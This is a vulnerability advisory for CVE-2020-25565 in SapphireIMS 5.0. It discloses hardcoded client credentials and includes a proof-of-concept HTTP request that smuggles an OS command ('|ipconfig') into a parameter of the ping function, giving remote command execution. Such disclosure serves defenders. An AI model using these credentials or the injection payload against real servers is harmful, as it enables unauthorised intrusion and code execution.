[CVE-2020-25565] SapphireIMS: Unprivileged user remote command execution on server
Posted on
Description
In SapphireIMS 5.0, it is possible to use the hardcoded credential in clients (username: sapphire, password: ims) and gain access to the portal. Once the access is available, the attacker can inject malicious OS commands on “ping”, “traceroute” and “snmp” functions and execute code on the server.
CVSS 3.0 Base Score
9.9 (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)
Researcher
Tanoy Bose
POC
Request (Command Exec)
1 2 3 4 5 6 7 8 9
GET /SapphireIMS/CmdProcess?hostorip=127.0.0.1&pagefrom=Ping¶m1=1000¶m2=4¶m3=32|ipconfig HTTP/1.1 Host: 192.168.191.48 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: JSESSIONID=Ni+9V4wVLLkXCe5J0mirr2XX Connection: close Upgrade-Insecure-Requests: 1